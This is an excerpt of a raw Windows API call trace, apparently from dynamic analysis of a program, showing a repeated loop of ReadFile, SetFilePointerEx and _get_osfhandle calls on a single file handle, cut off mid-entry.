[0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.347] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.347] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.347] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.348] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.348] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.348] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.349] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.349] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.349] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.350] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.350] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.350] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.351] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.351] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.351] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.352] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.352] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.352] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.353] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.353] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.353] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.354] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.354] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.354] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.355] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.355] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.355] _get_osfhandle 